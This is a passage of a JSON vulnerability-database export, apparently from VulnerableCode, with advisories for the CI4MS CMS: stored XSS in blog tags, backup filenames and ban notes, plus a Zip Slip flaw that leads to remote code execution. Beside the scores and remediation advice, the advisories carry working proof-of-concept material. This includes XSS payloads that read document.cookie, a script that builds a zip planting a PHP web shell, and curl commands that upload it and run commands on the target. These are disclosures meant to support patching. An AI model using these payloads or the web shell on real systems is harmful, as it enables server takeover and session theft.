methods:** Do not use `.html()`, `innerHTML`, or similar sink functions in client-side JavaScript or server-side templating (e.g., PHP). Even when user input flowing into these sinks is not immediately apparent, they can introduce Cross-Site Scripting (XSS) vulnerabilities that an attacker may exploit.\n\n- **Apply output encoding:** Implement HTML entity encoding on all user-controlled data before rendering it in the browser. This helps neutralize potentially malicious input.\n\n- **Implement input sanitization:** Ensure that all user-supplied input is properly sanitized before processing or output. Currently, no sanitization mechanisms are in place, which should be addressed as a priority.\n\n- **Enforce security headers and cookie attributes:**\n - **Content Security Policy (CSP):** Define and enforce a strict CSP to limit the execution of unauthorized scripts.\n - **HttpOnly flag:** Set the `HttpOnly` attribute on session cookies to prevent client-side script access.\n - **SameSite attribute:** Configure the `SameSite` cookie attribute to mitigate Cross-Site Request Forgery (CSRF) risks.\n - **Secure flag:** Ensure all cookies are transmitted only over HTTPS by enabling the `Secure` attribute.\n\n These measures collectively reduce the impact of XSS and help prevent escalation paths such as CSRF via XSS.\n\n# Ready Video POC:\nhttps://mega.nz/file/iAkWAKQY#hCUv4DlMPFykPvb4gO94ZVGj64tpUk99gLxE6u1kASk", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34566", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15923", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15872", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15912", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.18292", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34566" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-04T03:15:25Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-458r-h248-29c5", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-04T03:15:25Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-458r-h248-29c5" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34566", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34566" }, { "reference_url": "https://github.com/advisories/GHSA-458r-h248-29c5", "reference_id": "GHSA-458r-h248-29c5", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-458r-h248-29c5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2v9s-x9dt-8ugb" }, { "vulnerability": "VCID-6nzs-j8gz-9ucu" }, { "vulnerability": "VCID-8x3z-1p5j-6qfa" }, { "vulnerability": "VCID-c1ux-y4qk-xfch" }, { "vulnerability": "VCID-e9xp-rar3-c7bp" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-j32w-tcpz-1fak" }, { "vulnerability": "VCID-mds3-7xh3-mkgv" }, { "vulnerability": "VCID-p1q2-w18a-3kae" }, { "vulnerability": "VCID-qrag-mndk-xbb7" }, { "vulnerability": "VCID-ux28-acyz-kqd1" }, { "vulnerability": "VCID-w12h-33nr-bufh" }, { "vulnerability": "VCID-ye3h-3tu7-p3e7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0" } ], "aliases": [ "CVE-2026-34566", "GHSA-458r-h248-29c5" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-j76j-w4bk-nuft" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90026?format=api", "vulnerability_id": "VCID-kedh-z3qx-rfaq", "summary": "CI4MS: Blogs Tags Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n## Summary\n### **Vulnerability: Stored DOM XSS via Blog Tag Name (Persistent Payload Injection)**\n- Stored Cross-Site Scripting via Unsanitized Blog Tag Name in Blog Management\n\n### Description\nThe application fails to properly sanitize user-controlled input when creating or editing blog tags. An attacker can inject a malicious JavaScript payload into the tag name field, which is then stored server-side.\n\nThis stored payload is later rendered unsafely across public tag pages and administrative interfaces without proper output encoding, leading to stored cross-site scripting (XSS).\n\n### Affected Functionality\n- Blog tag creation functionality\n- Blog tag editing functionality\n- Blog tag storage and retrieval logic\n\n### Attack Scenario\n- An attacker creates or edits a blog tag name to include a malicious XSS payload.\n- The application stores this value without sanitization or encoding.\n- The payload persists and executes whenever the tag name is rendered in affected views.\n\n### Impact\n- Persistent Stored XSS\n- Execution of arbitrary JavaScript in victims’ browsers\n- Privilege escalation when viewed by administrators or privileged users\n- Full administrator account takeover\n- Full account takeover across all roles\n- Full compromise of the entire application\n\nEndpoints:\n- `/backend/blogs/tags/`\n- `/blog/{id}`\n\n## Steps To Reproduce (POC)\n1. Go to the Blog Tags management page\n2. Create or edit a tag and insert an XSS payload into the tag name such as:\n`<img src=x onerror=alert(document.domain)>`\n3. Save the tag\n4. View a public blog page or the administrative interface where the tag is rendered\n5. Notice the XSS payload executing automatically\n\n## Remediation\n\n- **Avoid unsafe DOM manipulation methods:** Do not use `.html()`, `innerHTML`, or similar sink functions in client-side JavaScript or server-side templating (e.g., PHP). Even when user input flowing into these sinks is not immediately apparent, they can introduce Cross-Site Scripting (XSS) vulnerabilities that an attacker may exploit.\n\n- **Apply output encoding:** Implement HTML entity encoding on all user-controlled data before rendering it in the browser. This helps neutralize potentially malicious input.\n\n- **Implement input sanitization:** Ensure that all user-supplied input is properly sanitized before processing or output. Currently, no sanitization mechanisms are in place, which should be addressed as a priority.\n\n- **Enforce security headers and cookie attributes:**\n - **Content Security Policy (CSP):** Define and enforce a strict CSP to limit the execution of unauthorized scripts.\n - **HttpOnly flag:** Set the `HttpOnly` attribute on session cookies to prevent client-side script access.\n - **SameSite attribute:** Configure the `SameSite` cookie attribute to mitigate Cross-Site Request Forgery (CSRF) risks.\n - **Secure flag:** Ensure all cookies are transmitted only over HTTPS by enabling the `Secure` attribute.\n\n These measures collectively reduce the impact of XSS and help prevent escalation paths such as CSRF via XSS.\n# Ready Video POC:\nhttps://mega.nz/file/GI9Bnbha#FkVY4K7AiuttnBGDFaCtxuJwKk-afRcKjYJnkqfLZOM", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34559", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.05058", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.05035", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.05043", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.06082", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34559" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-4333-387x-w245", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-4333-387x-w245" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34559", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34559" }, { "reference_url": "https://github.com/advisories/GHSA-4333-387x-w245", "reference_id": "GHSA-4333-387x-w245", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4333-387x-w245" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2v9s-x9dt-8ugb" }, { "vulnerability": "VCID-6nzs-j8gz-9ucu" }, { "vulnerability": "VCID-8x3z-1p5j-6qfa" }, { "vulnerability": "VCID-c1ux-y4qk-xfch" }, { "vulnerability": "VCID-e9xp-rar3-c7bp" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-j32w-tcpz-1fak" }, { "vulnerability": "VCID-mds3-7xh3-mkgv" }, { "vulnerability": "VCID-p1q2-w18a-3kae" }, { "vulnerability": "VCID-qrag-mndk-xbb7" }, { "vulnerability": "VCID-ux28-acyz-kqd1" }, { "vulnerability": "VCID-w12h-33nr-bufh" }, { "vulnerability": "VCID-ye3h-3tu7-p3e7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0" } ], "aliases": [ "CVE-2026-34559", "GHSA-4333-387x-w245" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-kedh-z3qx-rfaq" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89081?format=api", "vulnerability_id": "VCID-mds3-7xh3-mkgv", "summary": "CI4MS Theme::upload is vulnerable to Zip Slip leading to RCE\n### Summary\nci4ms Theme::upload extracts user uploaded ZIP archives without validating entry names, allowing an authenticated backend user with the theme create permission to write files to arbitrary filesystem locations (Zip Slip) and achieve remote code execution by dropping a PHP file under the public web root.\n\n### Details\nmodules/Theme/Controllers/Theme.php:13-56 implements the theme upload action. ZipArchive::extractTo() is called directly with no iteration over entry names to verify they resolve inside the destination:\n\n```php\npublic function upload()\n{\n $valData = ([\n 'theme' => ['label' => lang('Theme.backendTheme'), 'rules' => 'uploaded[theme]|ext_in[theme,zip]|mime_in[theme,...]'],\n ]);\n if ($this->validate($valData) == false) return redirect()->route('backendThemes')->withInput()->with('errors', $this->validator->getErrors());\n $file = $this->request->getFile('theme');\n $tempPath = WRITEPATH . 'tmp/' . str_replace('_theme.zip', '', $file->getName()) . '/';\n $zip = new \\ZipArchive();\n if ($zip->open($file->getTempName()) === true) {\n $zip->extractTo($tempPath); // no entry-name validation\n $zip->close();\n } ...\n $log = install_theme_from_tmp($themeName);\n ...\n}\n```\n\nA ZIP containing entries like `../../public/shell.php` is extracted outside `writable/tmp/` into directories served by PHP. The author validates entries correctly in modules/Methods/Controllers/Methods.php:165-175 with a realpath + regex loop; the same check is missing here.\n\nRouting: modules/Theme/Config/Routes.php binds `POST backend/themes/themesUpload` to Theme::upload with `role=create`. Although ThemeConfig itself does not list the route in csrfExcept, the upload handler is still reachable cross-site by any admin browser that has `create` on the Theme module, and any admin with that role can trigger it directly.\n\nA companion Zip Slip bug in Backup::restore is tracked separately as GHSA-xp9f-pvvc-57p4.\n\n### PoC\nBuild the archive:\n\n```python\npython3 -c \"\nimport zipfile\nwith zipfile.ZipFile('evil_theme.zip','w') as z:\n z.writestr('../../public/shell.php', '<?php system(\\$_GET[\\\"c\\\"]); ?>')\n z.writestr('info.xml', '<theme name=\\\"x\\\"/>')\n\"\n```\n\nUpload through the Theme manager with an authenticated session that has theme create:\n\n```bash\ncurl -i -b 'ci4ms_session=<SESSION_ID>' \\\n -F 'theme=@evil_theme.zip' \\\n https://target.example.com/backend/themes/themesUpload\n```\n\nTrigger the shell:\n\n```bash\ncurl 'https://target.example.com/shell.php?c=id'\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\n```\n\n### Impact\nAny ci4ms account that can upload a theme can write arbitrary files under the application root and gain remote code execution on the server, fully compromising the installation, the database credentials stored in .env, and any content the site handles.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41203", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00464", "scoring_system": "epss", "scoring_elements": "0.64694", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00464", "scoring_system": "epss", "scoring_elements": "0.64693", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00464", "scoring_system": "epss", "scoring_elements": "0.64703", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00534", "scoring_system": "epss", "scoring_elements": "0.67775", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41203" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.5.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-07T13:49:29Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.5.0" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-xv3r-vr59-95rg", "reference_id": "", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-07T13:49:29Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-xv3r-vr59-95rg" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41203", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41203" }, { "reference_url": "https://github.com/advisories/GHSA-xv3r-vr59-95rg", "reference_id": "GHSA-xv3r-vr59-95rg", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-xv3r-vr59-95rg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1126288?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.5", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1041566?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.5.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-cd9w-5f22-xkfk" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-qrag-mndk-xbb7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.5.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/110106?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.5%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.5%252B0" } ], "aliases": [ "CVE-2026-41203", "GHSA-xv3r-vr59-95rg" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mds3-7xh3-mkgv" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89213?format=api", "vulnerability_id": "VCID-p1q2-w18a-3kae", "summary": "CI4MS has stored XSS via Unescaped Blacklist Note in Admin User List\n## Summary\n\nThe blacklist (ban) note parameter in `UserController::ajax_blackList_post()` is stored in the database without sanitization and rendered into an HTML `data-note` attribute without escaping. An admin with blacklist privileges can inject arbitrary JavaScript that executes in the browser of any other admin who views the user management page.\n\n## Details\n\nIn `modules/Users/Controllers/UserController.php`, the `ajax_blackList_post()` method (line 344-362) accepts a `note` POST parameter with only a `required` validation rule:\n\n```php\n// Line 347 — validation only checks 'required', no sanitization\n$valData = (['note' => ['label' => lang('Backend.notes'), 'rules' => 'required'],\n 'uid' => ['label' => 'uid', 'rules' => 'required|is_natural_no_zero']]);\n\n// Line 352 — raw user input passed directly to ban()\n$user->ban($this->request->getPost('note'));\n```\n\nShield's `Bannable::ban()` trait stores the message as-is:\n```php\n// vendor/codeigniter4/shield/src/Traits/Bannable.php\npublic function ban(?string $message = null): self\n{\n $this->status = 'banned';\n $this->status_message = $message; // No escaping\n // ...\n}\n```\n\nIn the `users()` method (line 13-91), when building the DataTables response, the `status_message` is concatenated directly into HTML without escaping:\n\n```php\n// Line 55 — esc() IS used here (correct)\n$result->fullname = esc($result->firstname) . ' ' . esc($result->surname);\n\n// Line 58-59 — NO esc() on status_message (vulnerable)\nif ($result->status == 'banned'):\n $result->actions .= '<button ... data-note=\"' . $result->status_message . '\">'\n```\n\nThe HTML string is returned as JSON (line 90) and DataTables renders it into the DOM. CSP is disabled (`$CSPEnabled = false` in `App.php`), and no `SecureHeaders` filter is applied.\n\n## PoC\n\n**Step 1 — Store XSS payload via ban endpoint:**\n```bash\ncurl -X POST 'https://TARGET/backend/users/blackList' \\\n -H 'X-Requested-With: XMLHttpRequest' \\\n -H 'Cookie: ci_session=ADMIN_SESSION_WITH_UPDATE_PERM' \\\n -d 'uid=2¬e=%22+onmouseover%3D%22alert(document.cookie)%22+x%3D%22'\n```\n\nExpected response: `{\"result\":true,\"error\":{\"type\":\"success\",\"message\":\"...\"}}`\n\n**Step 2 — Trigger payload:**\nAny admin navigating to `/backend/users` will receive HTML containing:\n```html\n<button ... data-note=\"\" onmouseover=\"alert(document.cookie)\" x=\"\">\n```\n\nThe XSS fires when the admin hovers over the blacklist button for the banned user.\n\n**Alternative immediate-execution payload:**\n```\nnote=\"><img src=x onerror=alert(document.cookie)>\n```\n\n## Impact\n\n- **Session hijacking**: An attacker with blacklist privileges can steal session cookies of other admins (including superadmins who view the user list but are themselves protected from being banned).\n- **Privilege escalation**: A lower-privileged admin could use stolen superadmin sessions to gain full control.\n- **Persistent**: The payload persists in the database and fires every time the user list is loaded, affecting all admins who view the page.\n\n## Recommended Fix\n\nWrap `status_message` with `esc()` to match the escaping already applied to other user fields on line 55:\n\n```php\n// In users() method, line 58-59 — change:\n$result->actions .= '<button type=\"button\" class=\"btn btn-outline-dark btn-sm open-blacklist-modal\"\n data-id=\"' . $result->id . '\" data-status=\"' . $result->status . '\" data-note=\"' . esc($result->status_message) . '\"><i\n```", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39391", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02552", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02483", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02498", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02555", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39391" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.4.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.4.0" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-7cm9-v848-cfh2", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T15:18:05Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-7cm9-v848-cfh2" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39391", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39391" }, { "reference_url": "https://github.com/advisories/GHSA-7cm9-v848-cfh2", "reference_id": "GHSA-7cm9-v848-cfh2", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7cm9-v848-cfh2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1015581?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.4.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-cd9w-5f22-xkfk" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-j32w-tcpz-1fak" }, { "vulnerability": "VCID-mds3-7xh3-mkgv" }, { "vulnerability": "VCID-qrag-mndk-xbb7" }, { "vulnerability": "VCID-ux28-acyz-kqd1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.4.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/110229?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.4%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.4%252B0" } ], "aliases": [ "CVE-2026-39391", "GHSA-7cm9-v848-cfh2" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p1q2-w18a-3kae" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90287?format=api", "vulnerability_id": "VCID-pds3-bx1t-zfbt", "summary": "CI4MS: Backup Management Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM Blind XSS\n## Summary\n### **Vulnerability: Stored DOM Blind XSS via Backup Management Filename (Persistent Payload Injection)**\n- Stored Cross-Site Scripting (Blind XSS) via Unsanitized Backup Filename in Backup Management\n\n### Description\nThe application fails to properly sanitize user-controlled input when handling backup uploads and processing backup metadata. An attacker can inject a malicious JavaScript payload into the backup filename via the uploaded `xss.sql`, which uses SQL functionality to insert the XSS payload server-side.\n\nThis stored payload is later rendered unsafely in multiple backup management views without proper output encoding, leading to stored blind cross-site scripting (Blind XSS).\n\n### Affected Functionality\n- Backup upload functionality\n- Backup processing functionality\n- Backup storage and retrieval logic\n\n### Attack Scenario\n- An attacker uploads `xss.sql` which uses SQL functionality to insert a malicious XSS payload into the backup filename field server-side.\n- The application stores this filename without sanitization or encoding.\n- The payload persists and executes whenever the backup filename is rendered in affected views.\n- The attacker does not see immediate execution, making this a Blind XSS scenario that triggers only when an administrator or privileged user views the backup management panel.\n\n### Impact\n- Persistent Stored Blind XSS\n- Execution of arbitrary JavaScript in victims’ browsers\n- Privilege escalation when viewed by administrators or privileged users\n- Full administrator account takeover\n- Full account takeover across all roles\n- Full compromise of the entire application\n\nEndpoints:\n- `/backend/backup/upload`\n- `/backend/backup/`\n- `/backup/{id}`\n\n## Steps To Reproduce (POC)\n1. Upload `xss.sql` via the Backup Upload functionality\n2. Ensure the SQL executes and inserts an XSS payload into the backup filename field such as:\n`<img src=x onerror=alert(document.domain)>`\n3. Navigate to the Backup Management panel as an administrator\n4. View the backup entry via the administrative panel\n5. Notice the XSS payload executing automatically (Blind XSS)\n\n## Remediation\n\n- **Avoid unsafe DOM manipulation methods:** Do not use `.html()`, `innerHTML`, or similar sink functions in client-side JavaScript or server-side templating (e.g., PHP). Even when user input flowing into these sinks is not immediately apparent, they can introduce Cross-Site Scripting (XSS) vulnerabilities that an attacker may exploit.\n\n- **Apply output encoding:** Implement HTML entity encoding on all user-controlled data before rendering it in the browser. This helps neutralize potentially malicious input.\n\n- **Implement input sanitization:** Ensure that all user-supplied input is properly sanitized before processing or output. Currently, no sanitization mechanisms are in 